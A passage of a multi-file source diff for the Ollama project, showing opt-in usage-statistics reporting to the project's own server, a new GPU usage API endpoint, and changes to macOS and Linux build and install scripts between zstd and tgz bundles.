curl -fsSL https://ollama.com/download/ollama-linux-amd64.tar.zst \
| sudo tar x -C /usr
curl -fsSL https://ollama.com/download/ollama-linux-amd64.tgz \
| sudo tar zx -C /usr
```
## Installing specific versions

View File

@@ -206,6 +206,8 @@ var (
UseAuth = Bool("OLLAMA_AUTH")
// Enable Vulkan backend
EnableVulkan = Bool("OLLAMA_VULKAN")
// Usage enables usage statistics reporting
Usage = Bool("OLLAMA_USAGE")
)
func String(s string) func() string {

View File

@@ -1,7 +1,5 @@
package fs
import "iter"
type Config interface {
Architecture() string
String(string, ...string) string
@@ -13,8 +11,4 @@ type Config interface {
Ints(string, ...[]int32) []int32
Floats(string, ...[]float32) []float32
Bools(string, ...[]bool) []bool
Len() int
Keys() iter.Seq[string]
Value(key string) any
}

View File

@@ -6,9 +6,7 @@ import (
"errors"
"fmt"
"io"
"iter"
"log/slog"
"maps"
"math"
"slices"
"strings"
@@ -241,18 +239,6 @@ func (kv KV) Bools(key string, defaultValue ...[]bool) []bool {
return val.values
}
func (kv KV) Len() int {
return len(kv)
}
func (kv KV) Keys() iter.Seq[string] {
return maps.Keys(kv)
}
func (kv KV) Value(key string) any {
return kv[key]
}
func (kv KV) OllamaEngineRequired() bool {
return slices.Contains([]string{
"bert",

View File

@@ -8,12 +8,12 @@ import (
"fmt"
"io"
"log/slog"
"maps"
"os"
"runtime"
"slices"
"strings"
"github.com/ollama/ollama/fs"
"golang.org/x/sync/errgroup"
)
@@ -508,7 +508,7 @@ func writeGGUFArray[S ~[]E, E any](w io.Writer, t uint32, s S) error {
return binary.Write(w, binary.LittleEndian, s)
}
func WriteGGUF(f *os.File, kv fs.Config, ts []*Tensor) error {
func WriteGGUF(f *os.File, kv KV, ts []*Tensor) error {
arch := kv.String("general.architecture")
if arch == "" {
return fmt.Errorf("architecture not set")
@@ -526,12 +526,12 @@ func WriteGGUF(f *os.File, kv fs.Config, ts []*Tensor) error {
return err
}
if err := binary.Write(f, binary.LittleEndian, uint64(kv.Len())); err != nil {
if err := binary.Write(f, binary.LittleEndian, uint64(len(kv))); err != nil {
return err
}
for _, key := range slices.Sorted(kv.Keys()) {
if err := ggufWriteKV(f, arch, key, kv.Value(key)); err != nil {
for _, key := range slices.Sorted(maps.Keys(kv)) {
if err := ggufWriteKV(f, arch, key, kv[key]); err != nil {
return err
}
}

View File

@@ -21,7 +21,6 @@ import (
"golang.org/x/text/encoding/unicode"
"github.com/ollama/ollama/api"
"github.com/ollama/ollama/convert"
"github.com/ollama/ollama/fs/ggml"
)
@@ -802,7 +801,7 @@ func createBinFile(t *testing.T, kv map[string]any, ti []*ggml.Tensor) (string,
}
defer f.Close()
var base convert.KV = map[string]any{"general.architecture": "test"}
base := map[string]any{"general.architecture": "test"}
maps.Copy(base, kv)
if err := ggml.WriteGGUF(f, base, ti); err != nil {

View File

@@ -6,6 +6,9 @@ import (
var ErrInterrupt = errors.New("Interrupt")
// ErrExpandOutput is returned when user presses Ctrl+O to expand tool output
var ErrExpandOutput = errors.New("ExpandOutput")
type InterruptError struct {
Line []rune
}

View File

@@ -206,6 +206,9 @@ func (i *Instance) Readline() (string, error) {
buf.DeleteBefore()
case CharCtrlL:
buf.ClearScreen()
case CharCtrlO:
// Ctrl+O - expand tool output
return "", ErrExpandOutput
case CharCtrlW:
buf.DeleteWord()
case CharCtrlZ:

View File

@@ -42,39 +42,18 @@ shift $(( $OPTIND - 1 ))
_build_darwin() {
for ARCH in $ARCHS; do
status "Building darwin $ARCH"
INSTALL_PREFIX=dist/darwin-$ARCH/
INSTALL_PREFIX=dist/darwin-$ARCH/
GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 go build -o $INSTALL_PREFIX .
if [ "$ARCH" = "amd64" ]; then
status "Building darwin $ARCH dynamic backends"
BUILD_DIR=build/darwin-$ARCH
cmake -B $BUILD_DIR \
cmake -B build/darwin-$ARCH \
-DCMAKE_OSX_ARCHITECTURES=x86_64 \
-DCMAKE_OSX_DEPLOYMENT_TARGET=14.0 \
-DCMAKE_INSTALL_PREFIX=$INSTALL_PREFIX \
-DMLX_ENGINE=ON \
-DMLX_ENABLE_X64_MAC=ON \
-DOLLAMA_RUNNER_DIR=./
cmake --build $BUILD_DIR --target ggml-cpu -j
cmake --build $BUILD_DIR --target mlx mlxc -j
cmake --install $BUILD_DIR --component CPU
cmake --install $BUILD_DIR --component MLX
# Override CGO flags to point to the amd64 build directory
MLX_CGO_CFLAGS="-O3 -I$(pwd)/$BUILD_DIR/_deps/mlx-c-src -mmacosx-version-min=14.0"
MLX_CGO_LDFLAGS="-L$(pwd)/$BUILD_DIR/lib/ollama -lmlxc -lmlx -Wl,-rpath,@executable_path -lc++ -framework Accelerate -mmacosx-version-min=14.0"
else
BUILD_DIR=build
cmake --preset MLX \
-DOLLAMA_RUNNER_DIR=./ \
-DCMAKE_OSX_DEPLOYMENT_TARGET=14.0 \
-DCMAKE_OSX_DEPLOYMENT_TARGET=11.3 \
-DCMAKE_INSTALL_PREFIX=$INSTALL_PREFIX
cmake --build --preset MLX --parallel
cmake --install $BUILD_DIR --component MLX
# Use default CGO flags from mlx.go for arm64
MLX_CGO_CFLAGS="-O3 -I$(pwd)/$BUILD_DIR/_deps/mlx-c-src -mmacosx-version-min=14.0"
MLX_CGO_LDFLAGS="-L$(pwd)/$BUILD_DIR/lib/ollama -lmlxc -lmlx -Wl,-rpath,@executable_path -lc++ -framework Metal -framework Foundation -framework Accelerate -mmacosx-version-min=14.0"
cmake --build build/darwin-$ARCH --target ggml-cpu -j
cmake --install build/darwin-$ARCH --component CPU
fi
GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 CGO_CFLAGS="$MLX_CGO_CFLAGS" CGO_LDFLAGS="$MLX_CGO_LDFLAGS" go build -tags mlx -o $INSTALL_PREFIX/imagegen ./x/imagegen/cmd/engine
GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 go build -o $INSTALL_PREFIX .
done
}
@@ -82,12 +61,10 @@ _sign_darwin() {
status "Creating universal binary..."
mkdir -p dist/darwin
lipo -create -output dist/darwin/ollama dist/darwin-*/ollama
lipo -create -output dist/darwin/imagegen dist/darwin-*/imagegen
chmod +x dist/darwin/ollama
chmod +x dist/darwin/imagegen
if [ -n "$APPLE_IDENTITY" ]; then
for F in dist/darwin/ollama dist/darwin-*/lib/ollama/* dist/darwin/imagegen; do
for F in dist/darwin/ollama dist/darwin-amd64/lib/ollama/*; do
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime $F
done
@@ -154,23 +131,17 @@ _build_macapp() {
mkdir -p dist/Ollama.app/Contents/Resources
if [ -d dist/darwin-amd64 ]; then
lipo -create -output dist/Ollama.app/Contents/Resources/ollama dist/darwin-amd64/ollama dist/darwin-arm64/ollama
lipo -create -output dist/Ollama.app/Contents/Resources/imagegen dist/darwin-amd64/imagegen dist/darwin-arm64/imagegen
for F in dist/darwin-amd64/lib/ollama/*mlx*.dylib ; do
lipo -create -output dist/darwin/$(basename $F) $F dist/darwin-arm64/lib/ollama/$(basename $F)
done
cp dist/darwin-*/lib/ollama/*.so dist/darwin-*/lib/ollama/*.dylib dist/Ollama.app/Contents/Resources/
cp dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
cp dist/darwin-amd64/lib/ollama/*.so dist/darwin-amd64/lib/ollama/*.dylib dist/Ollama.app/Contents/Resources/
else
cp -a dist/darwin/ollama dist/Ollama.app/Contents/Resources/ollama
cp dist/darwin/*.so dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
fi
cp -a dist/darwin/imagegen dist/Ollama.app/Contents/Resources/imagegen
chmod a+x dist/Ollama.app/Contents/Resources/ollama
# Sign
if [ -n "$APPLE_IDENTITY" ]; then
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime dist/Ollama.app/Contents/Resources/ollama
for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib dist/Ollama.app/Contents/Resources/imagegen ; do
for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib ; do
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime ${lib}
done
codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier com.electron.ollama --deep --options=runtime dist/Ollama.app
@@ -178,7 +149,7 @@ _build_macapp() {
rm -f dist/Ollama-darwin.zip
ditto -c -k --keepParent dist/Ollama.app dist/Ollama-darwin.zip
(cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama imagegen *.so *.dylib) | gzip -9vc > dist/ollama-darwin.tgz
(cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama *.so *.dylib) | gzip -9vc > dist/ollama-darwin.tgz
# Notarize and Staple
if [ -n "$APPLE_IDENTITY" ]; then

View File

@@ -12,17 +12,6 @@ set -eu
. $(dirname $0)/env.sh
# Check for required tools
if ! command -v zstd >/dev/null 2>&1; then
echo "ERROR: zstd is required but not installed." >&2
echo "Please install zstd:" >&2
echo " - macOS: brew install zstd" >&2
echo " - Debian/Ubuntu: sudo apt-get install zstd" >&2
echo " - RHEL/CentOS/Fedora: sudo dnf install zstd" >&2
echo " - Arch: sudo pacman -S zstd" >&2
exit 1
fi
mkdir -p dist
docker buildx build \
@@ -48,68 +37,19 @@ if echo $PLATFORM | grep "amd64" > /dev/null; then
.
fi
# Deduplicate CUDA libraries across mlx_* and cuda_* directories
deduplicate_cuda_libs() {
local base_dir="$1"
echo "Deduplicating CUDA libraries in ${base_dir}..."
# Find all mlx_cuda_* directories
for mlx_dir in "${base_dir}"/lib/ollama/mlx_cuda_*; do
[ -d "${mlx_dir}" ] || continue
# Extract CUDA version (e.g., v12, v13)
cuda_version=$(basename "${mlx_dir}" | sed 's/mlx_cuda_//')
cuda_dir="${base_dir}/lib/ollama/cuda_${cuda_version}"
# Skip if corresponding cuda_* directory doesn't exist
[ -d "${cuda_dir}" ] || continue
echo " Checking ${mlx_dir} against ${cuda_dir}..."
# Find all .so* files in mlx directory
find "${mlx_dir}" -type f -name "*.so*" | while read mlx_file; do
filename=$(basename "${mlx_file}")
cuda_file="${cuda_dir}/${filename}"
# Skip if file doesn't exist in cuda directory
[ -f "${cuda_file}" ] || continue
# Compare checksums
mlx_sum=$(sha256sum "${mlx_file}" | awk '{print $1}')
cuda_sum=$(sha256sum "${cuda_file}" | awk '{print $1}')
if [ "${mlx_sum}" = "${cuda_sum}" ]; then
echo " Deduplicating ${filename}"
# Calculate relative path from mlx_dir to cuda_dir
rel_path="../cuda_${cuda_version}/${filename}"
rm -f "${mlx_file}"
ln -s "${rel_path}" "${mlx_file}"
fi
done
done
}
# Run deduplication for each platform output directory
if echo $PLATFORM | grep "," > /dev/null ; then
deduplicate_cuda_libs "./dist/linux_amd64"
deduplicate_cuda_libs "./dist/linux_arm64"
elif echo $PLATFORM | grep "amd64\|arm64" > /dev/null ; then
deduplicate_cuda_libs "./dist"
fi
# buildx behavior changes for single vs. multiplatform
echo "Compressing linux tar bundles..."
if echo $PLATFORM | grep "," > /dev/null ; then
tar c -C ./dist/linux_arm64 --exclude cuda_jetpack5 --exclude cuda_jetpack6 . | zstd --ultra -22 -T0 >./dist/ollama-linux-arm64.tar.zst
tar c -C ./dist/linux_arm64 ./lib/ollama/cuda_jetpack5 | zstd --ultra -22 -T0 >./dist/ollama-linux-arm64-jetpack5.tar.zst
tar c -C ./dist/linux_arm64 ./lib/ollama/cuda_jetpack6 | zstd --ultra -22 -T0 >./dist/ollama-linux-arm64-jetpack6.tar.zst
tar c -C ./dist/linux_amd64 --exclude rocm . | zstd --ultra -22 -T0 >./dist/ollama-linux-amd64.tar.zst
tar c -C ./dist/linux_amd64 ./lib/ollama/rocm | zstd --ultra -22 -T0 >./dist/ollama-linux-amd64-rocm.tar.zst
tar c -C ./dist/linux_arm64 --exclude cuda_jetpack5 --exclude cuda_jetpack6 . | pigz -9vc >./dist/ollama-linux-arm64.tgz
tar c -C ./dist/linux_arm64 ./lib/ollama/cuda_jetpack5 | pigz -9vc >./dist/ollama-linux-arm64-jetpack5.tgz
tar c -C ./dist/linux_arm64 ./lib/ollama/cuda_jetpack6 | pigz -9vc >./dist/ollama-linux-arm64-jetpack6.tgz
tar c -C ./dist/linux_amd64 --exclude rocm . | pigz -9vc >./dist/ollama-linux-amd64.tgz
tar c -C ./dist/linux_amd64 ./lib/ollama/rocm | pigz -9vc >./dist/ollama-linux-amd64-rocm.tgz
elif echo $PLATFORM | grep "arm64" > /dev/null ; then
tar c -C ./dist/ --exclude cuda_jetpack5 --exclude cuda_jetpack6 bin lib | zstd --ultra -22 -T0 >./dist/ollama-linux-arm64.tar.zst
tar c -C ./dist/ ./lib/ollama/cuda_jetpack5 | zstd --ultra -22 -T0 >./dist/ollama-linux-arm64-jetpack5.tar.zst
tar c -C ./dist/ ./lib/ollama/cuda_jetpack6 | zstd --ultra -22 -T0 >./dist/ollama-linux-arm64-jetpack6.tar.zst
tar c -C ./dist/ --exclude cuda_jetpack5 --exclude cuda_jetpack6 bin lib | pigz -9vc >./dist/ollama-linux-arm64.tgz
tar c -C ./dist/ ./lib/ollama/cuda_jetpack5 | pigz -9vc >./dist/ollama-linux-arm64-jetpack5.tgz
tar c -C ./dist/ ./lib/ollama/cuda_jetpack6 | pigz -9vc >./dist/ollama-linux-arm64-jetpack6.tgz
elif echo $PLATFORM | grep "amd64" > /dev/null ; then
tar c -C ./dist/ --exclude rocm bin lib | zstd --ultra -22 -T0 >./dist/ollama-linux-amd64.tar.zst
tar c -C ./dist/ ./lib/ollama/rocm | zstd --ultra -22 -T0 >./dist/ollama-linux-amd64-rocm.tar.zst
tar c -C ./dist/ --exclude rocm bin lib | pigz -9vc >./dist/ollama-linux-amd64.tgz
tar c -C ./dist/ ./lib/ollama/rocm | pigz -9vc >./dist/ollama-linux-amd64-rocm.tgz
fi

View File

@@ -66,36 +66,6 @@ if [ -n "$NEEDS" ]; then
exit 1
fi
# Function to download and extract with fallback from zst to tgz
download_and_extract() {
local url_base="$1"
local dest_dir="$2"
local filename="$3"
# Check if .tar.zst is available
if curl --fail --silent --head --location "${url_base}/${filename}.tar.zst${VER_PARAM}" >/dev/null 2>&1; then
# zst file exists - check if we have zstd tool
if ! available zstd; then
error "This version requires zstd for extraction. Please install zstd and try again:
- Debian/Ubuntu: sudo apt-get install zstd
- RHEL/CentOS/Fedora: sudo dnf install zstd
- Arch: sudo pacman -S zstd"
fi
status "Downloading ${filename}.tar.zst"
curl --fail --show-error --location --progress-bar \
"${url_base}/${filename}.tar.zst${VER_PARAM}" | \
zstd -d | $SUDO tar -xf - -C "${dest_dir}"
return 0
fi
# Fall back to .tgz for older versions
status "Downloading ${filename}.tgz"
curl --fail --show-error --location --progress-bar \
"${url_base}/${filename}.tgz${VER_PARAM}" | \
$SUDO tar -xzf - -C "${dest_dir}"
}
for BINDIR in /usr/local/bin /usr/bin /bin; do
echo $PATH | grep -q $BINDIR && break || continue
done
@@ -108,7 +78,10 @@ fi
status "Installing ollama to $OLLAMA_INSTALL_DIR"
$SUDO install -o0 -g0 -m755 -d $BINDIR
$SUDO install -o0 -g0 -m755 -d "$OLLAMA_INSTALL_DIR/lib/ollama"
download_and_extract "https://ollama.com/download" "$OLLAMA_INSTALL_DIR" "ollama-linux-${ARCH}"
status "Downloading Linux ${ARCH} bundle"
curl --fail --show-error --location --progress-bar \
"https://ollama.com/download/ollama-linux-${ARCH}.tgz${VER_PARAM}" | \
$SUDO tar -xzf - -C "$OLLAMA_INSTALL_DIR"
if [ "$OLLAMA_INSTALL_DIR/bin/ollama" != "$BINDIR/ollama" ] ; then
status "Making ollama accessible in the PATH in $BINDIR"
@@ -118,9 +91,15 @@ fi
# Check for NVIDIA JetPack systems with additional downloads
if [ -f /etc/nv_tegra_release ] ; then
if grep R36 /etc/nv_tegra_release > /dev/null ; then
download_and_extract "https://ollama.com/download" "$OLLAMA_INSTALL_DIR" "ollama-linux-${ARCH}-jetpack6"
status "Downloading JetPack 6 components"
curl --fail --show-error --location --progress-bar \
"https://ollama.com/download/ollama-linux-${ARCH}-jetpack6.tgz${VER_PARAM}" | \
$SUDO tar -xzf - -C "$OLLAMA_INSTALL_DIR"
elif grep R35 /etc/nv_tegra_release > /dev/null ; then
download_and_extract "https://ollama.com/download" "$OLLAMA_INSTALL_DIR" "ollama-linux-${ARCH}-jetpack5"
status "Downloading JetPack 5 components"
curl --fail --show-error --location --progress-bar \
"https://ollama.com/download/ollama-linux-${ARCH}-jetpack5.tgz${VER_PARAM}" | \
$SUDO tar -xzf - -C "$OLLAMA_INSTALL_DIR"
else
warning "Unsupported JetPack version detected. GPU may not be supported"
fi
@@ -243,7 +222,10 @@ if ! check_gpu lspci nvidia && ! check_gpu lshw nvidia && ! check_gpu lspci amdg
fi
if check_gpu lspci amdgpu || check_gpu lshw amdgpu; then
download_and_extract "https://ollama.com/download" "$OLLAMA_INSTALL_DIR" "ollama-linux-${ARCH}-rocm"
status "Downloading Linux ROCm ${ARCH} bundle"
curl --fail --show-error --location --progress-bar \
"https://ollama.com/download/ollama-linux-${ARCH}-rocm.tgz${VER_PARAM}" | \
$SUDO tar -xzf - -C "$OLLAMA_INSTALL_DIR"
install_success
status "AMD GPU ready."

View File

@@ -26,7 +26,6 @@ import (
"github.com/ollama/ollama/convert"
"github.com/ollama/ollama/envconfig"
"github.com/ollama/ollama/format"
ofs "github.com/ollama/ollama/fs"
"github.com/ollama/ollama/fs/ggml"
"github.com/ollama/ollama/template"
"github.com/ollama/ollama/types/errtypes"
@@ -455,7 +454,7 @@ func convertFromSafetensors(files map[string]string, baseLayers []*layerGGML, is
return layers, nil
}
func kvFromLayers(baseLayers []*layerGGML) (ofs.Config, error) {
func kvFromLayers(baseLayers []*layerGGML) (ggml.KV, error) {
for _, l := range baseLayers {
if l.GGML != nil {
return l.KV(), nil

View File

@@ -20,6 +20,7 @@ import (
"net/url"
"os"
"os/signal"
"runtime"
"slices"
"strings"
"sync/atomic"
@@ -44,6 +45,7 @@ import (
"github.com/ollama/ollama/model/renderers"
"github.com/ollama/ollama/server/internal/client/ollama"
"github.com/ollama/ollama/server/internal/registry"
"github.com/ollama/ollama/server/usage"
"github.com/ollama/ollama/template"
"github.com/ollama/ollama/thinking"
"github.com/ollama/ollama/tools"
@@ -82,6 +84,7 @@ type Server struct {
addr net.Addr
sched *Scheduler
lowVRAM bool
stats *usage.Stats
}
func init() {
@@ -104,6 +107,30 @@ var (
errBadTemplate = errors.New("template error")
)
// usage records a request to usage stats if enabled.
func (s *Server) usage(c *gin.Context, endpoint, model, architecture string, promptTokens, completionTokens int, usedTools bool) {
if s.stats == nil {
return
}
s.stats.Record(&usage.Request{
Endpoint: endpoint,
Model: model,
Architecture: architecture,
APIType: usage.ClassifyAPIType(c.Request.URL.Path),
PromptTokens: promptTokens,
CompletionTokens: completionTokens,
UsedTools: usedTools,
})
}
// usageError records a failed request to usage stats if enabled.
func (s *Server) usageError() {
if s.stats == nil {
return
}
s.stats.RecordError()
}
func modelOptions(model *Model, requestOpts map[string]any) (api.Options, error) {
opts := api.DefaultOptions()
if err := opts.FromMap(model.Options); err != nil {
@@ -374,7 +401,7 @@ func (s *Server) GenerateHandler(c *gin.Context) {
c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support generate", req.Model)})
return
} else if err != nil {
handleScheduleError(c, req.Model, err)
s.handleScheduleError(c, req.Model, err)
return
}
@@ -561,6 +588,7 @@ func (s *Server) GenerateHandler(c *gin.Context) {
res.DoneReason = cr.DoneReason.String()
res.TotalDuration = time.Since(checkpointStart)
res.LoadDuration = checkpointLoaded.Sub(checkpointStart)
s.usage(c, "generate", m.ShortName, m.Config.ModelFamily, cr.PromptEvalCount, cr.EvalCount, false)
if !req.Raw {
tokens, err := r.Tokenize(c.Request.Context(), prompt+sb.String())
@@ -680,7 +708,7 @@ func (s *Server) EmbedHandler(c *gin.Context) {
r, m, opts, err := s.scheduleRunner(c.Request.Context(), name.String(), []model.Capability{}, req.Options, req.KeepAlive)
if err != nil {
handleScheduleError(c, req.Model, err)
s.handleScheduleError(c, req.Model, err)
return
}
@@ -790,6 +818,7 @@ func (s *Server) EmbedHandler(c *gin.Context) {
LoadDuration: checkpointLoaded.Sub(checkpointStart),
PromptEvalCount: int(totalTokens),
}
s.usage(c, "embed", m.ShortName, m.Config.ModelFamily, int(totalTokens), 0, false)
c.JSON(http.StatusOK, resp)
}
@@ -827,7 +856,7 @@ func (s *Server) EmbeddingsHandler(c *gin.Context) {
r, _, _, err := s.scheduleRunner(c.Request.Context(), name.String(), []model.Capability{}, req.Options, req.KeepAlive)
if err != nil {
handleScheduleError(c, req.Model, err)
s.handleScheduleError(c, req.Model, err)
return
}
@@ -1531,6 +1560,7 @@ func (s *Server) GenerateRoutes(rc *ollama.Registry) (http.Handler, error) {
// Inference
r.GET("/api/ps", s.PsHandler)
r.GET("/api/usage", s.UsageHandler)
r.POST("/api/generate", s.GenerateHandler)
r.POST("/api/chat", s.ChatHandler)
r.POST("/api/embed", s.EmbedHandler)
@@ -1593,6 +1623,13 @@ func Serve(ln net.Listener) error {
s := &Server{addr: ln.Addr()}
// Initialize usage stats if enabled
if envconfig.Usage() {
s.stats = usage.New()
s.stats.Start()
slog.Info("usage stats enabled")
}
var rc *ollama.Registry
if useClient2 {
var err error
@@ -1632,6 +1669,9 @@ func Serve(ln net.Listener) error {
signal.Notify(signals, syscall.SIGINT, syscall.SIGTERM)
go func() {
<-signals
if s.stats != nil {
s.stats.Stop()
}
srvr.Close()
schedDone()
sched.unloadAllRunners()
@@ -1649,6 +1689,24 @@ func Serve(ln net.Listener) error {
gpus := discover.GPUDevices(ctx, nil)
discover.LogDetails(gpus)
// Set GPU info for usage reporting
if s.stats != nil {
usage.GPUInfoFunc = func() []usage.GPU {
var result []usage.GPU
for _, gpu := range gpus {
result = append(result, usage.GPU{
Name: gpu.Name,
VRAMBytes: gpu.TotalMemory,
ComputeMajor: gpu.ComputeMajor,
ComputeMinor: gpu.ComputeMinor,
DriverMajor: gpu.DriverMajor,
DriverMinor: gpu.DriverMinor,
})
}
return result
}
}
var totalVRAM uint64
for _, gpu := range gpus {
totalVRAM += gpu.TotalMemory - envconfig.GpuOverhead()
@@ -1852,6 +1910,63 @@ func (s *Server) PsHandler(c *gin.Context) {
c.JSON(http.StatusOK, api.ProcessResponse{Models: models})
}
func (s *Server) UsageHandler(c *gin.Context) {
// Get total VRAM used by Ollama
s.sched.loadedMu.Lock()
var totalOllamaVRAM uint64
for _, runner := range s.sched.loaded {
totalOllamaVRAM += runner.vramSize
}
s.sched.loadedMu.Unlock()
var resp api.UsageResponse
// Get GPU/device info
gpus := discover.GPUDevices(c.Request.Context(), nil)
// On Apple Silicon, use system memory instead of Metal's recommendedMaxWorkingSetSize
// because unified memory means GPU and CPU share the same physical RAM pool
var sysTotal, sysFree uint64
if runtime.GOOS == "darwin" && runtime.GOARCH == "arm64" {
sysInfo := discover.GetSystemInfo()
sysTotal = sysInfo.TotalMemory
sysFree = sysInfo.FreeMemory
}
for _, gpu := range gpus {
total := gpu.TotalMemory
free := gpu.FreeMemory
// On Apple Silicon, override with system memory values
if runtime.GOOS == "darwin" && runtime.GOARCH == "arm64" && sysTotal > 0 {
total = sysTotal
free = sysFree
}
used := total - free
ollamaUsed := min(totalOllamaVRAM, used)
otherUsed := used - ollamaUsed
// Use Description for Name (actual device name like "Apple M2 Max")
// Fall back to backend name if Description is empty
name := gpu.Description
if name == "" {
name = gpu.Name
}
resp.GPUs = append(resp.GPUs, api.GPUUsage{
Name: name,
Backend: gpu.Library,
Total: total,
Free: free,
Used: ollamaUsed,
Other: otherUsed,
})
}
c.JSON(http.StatusOK, resp)
}
func toolCallId() string {
const letterBytes = "abcdefghijklmnopqrstuvwxyz0123456789"
b := make([]byte, 8)
@@ -2032,7 +2147,7 @@ func (s *Server) ChatHandler(c *gin.Context) {
c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support chat", req.Model)})
return
} else if err != nil {
handleScheduleError(c, req.Model, err)
s.handleScheduleError(c, req.Model, err)
return
}
@@ -2180,6 +2295,7 @@ func (s *Server) ChatHandler(c *gin.Context) {
res.DoneReason = r.DoneReason.String()
res.TotalDuration = time.Since(checkpointStart)
res.LoadDuration = checkpointLoaded.Sub(checkpointStart)
s.usage(c, "chat", m.ShortName, m.Config.ModelFamily, r.PromptEvalCount, r.EvalCount, len(req.Tools) > 0)
}
if builtinParser != nil {
@@ -2355,6 +2471,7 @@ func (s *Server) ChatHandler(c *gin.Context) {
resp.Message.ToolCalls = toolCalls
}
s.usage(c, "chat", m.ShortName, m.Config.ModelFamily, resp.PromptEvalCount, resp.EvalCount, len(toolCalls) > 0)
c.JSON(http.StatusOK, resp)
return
}
@@ -2362,7 +2479,8 @@ func (s *Server) ChatHandler(c *gin.Context) {
streamResponse(c, ch)
}
func handleScheduleError(c *gin.Context, name string, err error) {
func (s *Server) handleScheduleError(c *gin.Context, name string, err error) {
s.usageError()
switch {
case errors.Is(err, errCapabilities), errors.Is(err, errRequired):
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})

View File

@@ -22,7 +22,6 @@ import (
gocmpopts "github.com/google/go-cmp/cmp/cmpopts"
"github.com/ollama/ollama/api"
"github.com/ollama/ollama/convert"
"github.com/ollama/ollama/envconfig"
"github.com/ollama/ollama/fs/ggml"
"github.com/ollama/ollama/types/model"
@@ -42,7 +41,7 @@ func createBinFile(t *testing.T, kv map[string]any, ti []*ggml.Tensor) (string,
}
defer f.Close()
var base convert.KV = map[string]any{"general.architecture": "test"}
base := map[string]any{"general.architecture": "test"}
maps.Copy(base, kv)
if err := ggml.WriteGGUF(f, base, ti); err != nil {

View File

@@ -0,0 +1,60 @@
package server
import (
"encoding/json"
"net/http"
"testing"
"github.com/gin-gonic/gin"
"github.com/ollama/ollama/api"
)
func TestUsageHandler(t *testing.T) {
gin.SetMode(gin.TestMode)
t.Run("empty server", func(t *testing.T) {
s := Server{
sched: &Scheduler{
loaded: make(map[string]*runnerRef),
},
}
w := createRequest(t, s.UsageHandler, nil)
if w.Code != http.StatusOK {
t.Fatalf("expected status code 200, actual %d", w.Code)
}
var resp api.UsageResponse
if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
t.Fatal(err)
}
// GPUs may or may not be present depending on system
// Just verify we can decode the response
})
t.Run("response structure", func(t *testing.T) {
s := Server{
sched: &Scheduler{
loaded: make(map[string]*runnerRef),
},
}
w := createRequest(t, s.UsageHandler, nil)
if w.Code != http.StatusOK {
t.Fatalf("expected status code 200, actual %d", w.Code)
}
// Verify we can decode the response as valid JSON
var resp map[string]any
if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
t.Fatal(err)
}
// The response should be a valid object (not null)
if resp == nil {
t.Error("expected non-nil response")
}
})
}

65
server/usage/reporter.go Normal file
View File

@@ -0,0 +1,65 @@
package usage
import (
"bytes"
"context"
"encoding/json"
"fmt"
"net/http"
"time"
"github.com/ollama/ollama/version"
)
const (
reportTimeout = 10 * time.Second
usageURL = "https://ollama.com/api/usage"
)
// HeartbeatResponse is the response from the heartbeat endpoint.
type HeartbeatResponse struct {
UpdateVersion string `json:"update_version,omitempty"`
}
// UpdateAvailable returns the available update version, if any.
func (t *Stats) UpdateAvailable() string {
if v := t.updateAvailable.Load(); v != nil {
return v.(string)
}
return ""
}
// sendHeartbeat sends usage stats and checks for updates.
func (t *Stats) sendHeartbeat(payload *Payload) {
data, err := json.Marshal(payload)
if err != nil {
return
}
ctx, cancel := context.WithTimeout(context.Background(), reportTimeout)
defer cancel()
req, err := http.NewRequestWithContext(ctx, http.MethodPost, usageURL, bytes.NewReader(data))
if err != nil {
return
}
req.Header.Set("Content-Type", "application/json")
req.Header.Set("User-Agent", fmt.Sprintf("ollama/%s", version.Version))
resp, err := http.DefaultClient.Do(req)
if err != nil {
return
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return
}
var heartbeat HeartbeatResponse
if err := json.NewDecoder(resp.Body).Decode(&heartbeat); err != nil {
return
}
t.updateAvailable.Store(heartbeat.UpdateVersion)
}

23
server/usage/source.go Normal file
View File

@@ -0,0 +1,23 @@
package usage
import (
"strings"
)
// API type constants
const (
APITypeOllama = "ollama"
APITypeOpenAI = "openai"
APITypeAnthropic = "anthropic"
)
// ClassifyAPIType determines the API type from the request path.
func ClassifyAPIType(path string) string {
if strings.HasPrefix(path, "/v1/messages") {
return APITypeAnthropic
}
if strings.HasPrefix(path, "/v1/") {
return APITypeOpenAI
}
return APITypeOllama
}

324
server/usage/usage.go Normal file
View File

@@ -0,0 +1,324 @@
// Package usage provides in-memory usage statistics collection and reporting.
package usage
import (
"runtime"
"sync"
"sync/atomic"
"time"
"github.com/ollama/ollama/discover"
"github.com/ollama/ollama/version"
)
// Stats collects usage statistics in memory and reports them periodically.
type Stats struct {
mu sync.RWMutex
// Atomic counters for hot path
requestsTotal atomic.Int64
tokensPrompt atomic.Int64
tokensCompletion atomic.Int64
errorsTotal atomic.Int64
// Map-based counters (require lock)
endpoints map[string]int64
architectures map[string]int64
apis map[string]int64
models map[string]*ModelStats // per-model stats
// Feature usage
toolCalls atomic.Int64
structuredOutput atomic.Int64
// Update info (set by reporter after pinging update endpoint)
updateAvailable atomic.Value // string
// Reporter
stopCh chan struct{}
doneCh chan struct{}
interval time.Duration
endpoint string
}
// ModelStats tracks per-model usage statistics.
type ModelStats struct {
Requests int64
TokensInput int64
TokensOutput int64
}
// Request contains the data to record for a single request.
type Request struct {
Endpoint string // "chat", "generate", "embed"
Model string // model name (e.g., "llama3.2:3b")
